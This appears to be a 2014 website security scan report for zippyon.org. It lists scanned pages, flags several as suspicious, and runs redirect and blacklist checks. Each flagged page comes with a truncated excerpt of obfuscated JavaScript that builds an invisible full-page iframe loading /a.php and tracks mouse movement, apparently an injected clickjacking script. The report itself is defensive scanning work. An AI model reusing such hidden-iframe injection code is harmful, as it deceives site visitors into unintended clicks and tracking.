Scanned pages/files
Request | Server response | Status |
http://zippyon.org/ | 200 OK Content-Length: 12690 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var _0x1d2a=["getTime","setTime","cookie"," = ","","; expires = ","toGMTString","; path=/",";","split","length","=","indexOf","substr","replace","dj","trage","Netscape","appName","pageX","clientX","pageY","clientY","left","style","djlist","getElementById","px","top","display","none","focus","djlist8()","900","iframe","getElementsByTagName","onmouseover","onmouseout","attachEvent","undefined","onblur","addEventListener","blur","createElement","class","djlist1","setAttribute","id","src","/a.php","scrolling","no","frameborder","0","opacity:0.00; filter:alpha(opacity=0); -moz-opacity: 0.00;position:absolute;top:0;left:0;z-index:200000;overflow:hidden;height:100%;width:100%;margin-left:0px;","appendChild","body","onmousemove"];function setCookie(_0xd1f7x2,_0x ...[2281 bytes skipped]... | ||
http://hdon.org/wp-content/themes/filme/db/jquery1.7.2.min.js | 200 OK Content-Length: 96778 Content-Type: text/javascript | clean |
http://hdon.org/wp-content/themes/filme/db/sly.min.js | 200 OK Content-Length: 22410 Content-Type: text/javascript | clean |
http://www.google.com/jsapi | 200 OK Content-Length: 24552 Content-Type: text/javascript | clean |
http://zippyon.org/ajax/labs.js | 200 OK Content-Length: 4965 Content-Type: text/javascript | clean |
http://zippyon.org/popup.js | 200 OK Content-Length: 19465 Content-Type: text/javascript | clean |
http://zippyon.org/?q=Nikola+Gala+Sayta | 200 OK Content-Length: 12844 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var _0x1d2a=["getTime","setTime","cookie"," = ","","; expires = ","toGMTString","; path=/",";","split","length","=","indexOf","substr","replace","dj","trage","Netscape","appName","pageX","clientX","pageY","clientY","left","style","djlist","getElementById","px","top","display","none","focus","djlist8()","900","iframe","getElementsByTagName","onmouseover","onmouseout","attachEvent","undefined","onblur","addEventListener","blur","createElement","class","djlist1","setAttribute","id","src","/a.php","scrolling","no","frameborder","0","opacity:0.00; filter:alpha(opacity=0); -moz-opacity: 0.00;position:absolute;top:0;left:0;z-index:200000;overflow:hidden;height:100%;width:100%;margin-left:0px;","appendChild","body","onmousemove"];function setCookie(_0xd1f7x2,_0x ...[2281 bytes skipped]... | ||
http://zippyon.org/?q=Till+The+Sun+Is+Up+Hoxygen+The+Trupers+Remix+Edit | 200 OK Content-Length: 13073 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var _0x1d2a=["getTime","setTime","cookie"," = ","","; expires = ","toGMTString","; path=/",";","split","length","=","indexOf","substr","replace","dj","trage","Netscape","appName","pageX","clientX","pageY","clientY","left","style","djlist","getElementById","px","top","display","none","focus","djlist8()","900","iframe","getElementsByTagName","onmouseover","onmouseout","attachEvent","undefined","onblur","addEventListener","blur","createElement","class","djlist1","setAttribute","id","src","/a.php","scrolling","no","frameborder","0","opacity:0.00; filter:alpha(opacity=0); -moz-opacity: 0.00;position:absolute;top:0;left:0;z-index:200000;overflow:hidden;height:100%;width:100%;margin-left:0px;","appendChild","body","onmousemove"];function setCookie(_0xd1f7x2,_0x ...[2281 bytes skipped]... | ||
http://zippyon.org/?q=Newik+My+Love+Stereo+Players+Club+Mix | 200 OK Content-Length: 12984 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var _0x1d2a=["getTime","setTime","cookie"," = ","","; expires = ","toGMTString","; path=/",";","split","length","=","indexOf","substr","replace","dj","trage","Netscape","appName","pageX","clientX","pageY","clientY","left","style","djlist","getElementById","px","top","display","none","focus","djlist8()","900","iframe","getElementsByTagName","onmouseover","onmouseout","attachEvent","undefined","onblur","addEventListener","blur","createElement","class","djlist1","setAttribute","id","src","/a.php","scrolling","no","frameborder","0","opacity:0.00; filter:alpha(opacity=0); -moz-opacity: 0.00;position:absolute;top:0;left:0;z-index:200000;overflow:hidden;height:100%;width:100%;margin-left:0px;","appendChild","body","onmousemove"];function setCookie(_0xd1f7x2,_0x ...[2281 bytes skipped]... | ||
http://zippyon.org/?q=Train+To+Nowhere | 200 OK Content-Length: 12838 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var _0x1d2a=["getTime","setTime","cookie"," = ","","; expires = ","toGMTString","; path=/",";","split","length","=","indexOf","substr","replace","dj","trage","Netscape","appName","pageX","clientX","pageY","clientY","left","style","djlist","getElementById","px","top","display","none","focus","djlist8()","900","iframe","getElementsByTagName","onmouseover","onmouseout","attachEvent","undefined","onblur","addEventListener","blur","createElement","class","djlist1","setAttribute","id","src","/a.php","scrolling","no","frameborder","0","opacity:0.00; filter:alpha(opacity=0); -moz-opacity: 0.00;position:absolute;top:0;left:0;z-index:200000;overflow:hidden;height:100%;width:100%;margin-left:0px;","appendChild","body","onmousemove"];function setCookie(_0xd1f7x2,_0x ...[2281 bytes skipped]... | ||
http://zippyon.org/?q=The+Riff+%28Original+Mix%29+Mauro+Picotto%2C+Riccardo+Ferri | 200 OK Content-Length: 13096 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var _0x1d2a=["getTime","setTime","cookie"," = ","","; expires = ","toGMTString","; path=/",";","split","length","=","indexOf","substr","replace","dj","trage","Netscape","appName","pageX","clientX","pageY","clientY","left","style","djlist","getElementById","px","top","display","none","focus","djlist8()","900","iframe","getElementsByTagName","onmouseover","onmouseout","attachEvent","undefined","onblur","addEventListener","blur","createElement","class","djlist1","setAttribute","id","src","/a.php","scrolling","no","frameborder","0","opacity:0.00; filter:alpha(opacity=0); -moz-opacity: 0.00;position:absolute;top:0;left:0;z-index:200000;overflow:hidden;height:100%;width:100%;margin-left:0px;","appendChild","body","onmousemove"];function setCookie(_0xd1f7x2,_0x ...[2281 bytes skipped]... | ||
http://zippyon.org/?q=Bodybangers+Show+Me | 200 OK Content-Length: 12859 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var _0x1d2a=["getTime","setTime","cookie"," = ","","; expires = ","toGMTString","; path=/",";","split","length","=","indexOf","substr","replace","dj","trage","Netscape","appName","pageX","clientX","pageY","clientY","left","style","djlist","getElementById","px","top","display","none","focus","djlist8()","900","iframe","getElementsByTagName","onmouseover","onmouseout","attachEvent","undefined","onblur","addEventListener","blur","createElement","class","djlist1","setAttribute","id","src","/a.php","scrolling","no","frameborder","0","opacity:0.00; filter:alpha(opacity=0); -moz-opacity: 0.00;position:absolute;top:0;left:0;z-index:200000;overflow:hidden;height:100%;width:100%;margin-left:0px;","appendChild","body","onmousemove"];function setCookie(_0xd1f7x2,_0x ...[2281 bytes skipped]... | ||
http://zippyon.org/?q=John+Monkman+Feat+Morgan+Mackintosh+K.i.s.s.+M.e. | 200 OK Content-Length: 13073 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var _0x1d2a=["getTime","setTime","cookie"," = ","","; expires = ","toGMTString","; path=/",";","split","length","=","indexOf","substr","replace","dj","trage","Netscape","appName","pageX","clientX","pageY","clientY","left","style","djlist","getElementById","px","top","display","none","focus","djlist8()","900","iframe","getElementsByTagName","onmouseover","onmouseout","attachEvent","undefined","onblur","addEventListener","blur","createElement","class","djlist1","setAttribute","id","src","/a.php","scrolling","no","frameborder","0","opacity:0.00; filter:alpha(opacity=0); -moz-opacity: 0.00;position:absolute;top:0;left:0;z-index:200000;overflow:hidden;height:100%;width:100%;margin-left:0px;","appendChild","body","onmousemove"];function setCookie(_0xd1f7x2,_0x ...[2281 bytes skipped]... | ||
http://zippyon.org/?q=Sam+Osman | 200 OK Content-Length: 12788 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var _0x1d2a=["getTime","setTime","cookie"," = ","","; expires = ","toGMTString","; path=/",";","split","length","=","indexOf","substr","replace","dj","trage","Netscape","appName","pageX","clientX","pageY","clientY","left","style","djlist","getElementById","px","top","display","none","focus","djlist8()","900","iframe","getElementsByTagName","onmouseover","onmouseout","attachEvent","undefined","onblur","addEventListener","blur","createElement","class","djlist1","setAttribute","id","src","/a.php","scrolling","no","frameborder","0","opacity:0.00; filter:alpha(opacity=0); -moz-opacity: 0.00;position:absolute;top:0;left:0;z-index:200000;overflow:hidden;height:100%;width:100%;margin-left:0px;","appendChild","body","onmousemove"];function setCookie(_0xd1f7x2,_0x ...[2281 bytes skipped]... | ||
http://zippyon.org/?q=Sluts+Original+Mix | 200 OK Content-Length: 12855 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var _0x1d2a=["getTime","setTime","cookie"," = ","","; expires = ","toGMTString","; path=/",";","split","length","=","indexOf","substr","replace","dj","trage","Netscape","appName","pageX","clientX","pageY","clientY","left","style","djlist","getElementById","px","top","display","none","focus","djlist8()","900","iframe","getElementsByTagName","onmouseover","onmouseout","attachEvent","undefined","onblur","addEventListener","blur","createElement","class","djlist1","setAttribute","id","src","/a.php","scrolling","no","frameborder","0","opacity:0.00; filter:alpha(opacity=0); -moz-opacity: 0.00;position:absolute;top:0;left:0;z-index:200000;overflow:hidden;height:100%;width:100%;margin-left:0px;","appendChild","body","onmousemove"];function setCookie(_0xd1f7x2,_0x ...[2281 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zippyon.org
Result:
HTTP/1.1 200 OK
Cache-Control: private, must-revalidate
Connection: close
Date: Thu, 23 Oct 2014 00:21:23 GMT
Server: Apache/2.2.15
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Thu, 23 Oct 2014 00:31:23 GMT
X-Powered-By: PHP/5.3.3
GET / HTTP/1.1
Host: zippyon.org
Result:
HTTP/1.1 200 OK
Cache-Control: private, must-revalidate
Connection: close
Date: Thu, 23 Oct 2014 00:21:23 GMT
Server: Apache/2.2.15
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Thu, 23 Oct 2014 00:31:23 GMT
X-Powered-By: PHP/5.3.3
Second query (visit from search engine):
GET / HTTP/1.1
Host: zippyon.org
Referer: http://www.google.com/search?q=zippyon.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: zippyon.org
Referer: http://www.google.com/search?q=zippyon.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zippyon.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://zippyon.org/
Result: zippyon.org is not infected or malware details are not published yet.
Result: zippyon.org is not infected or malware details are not published yet.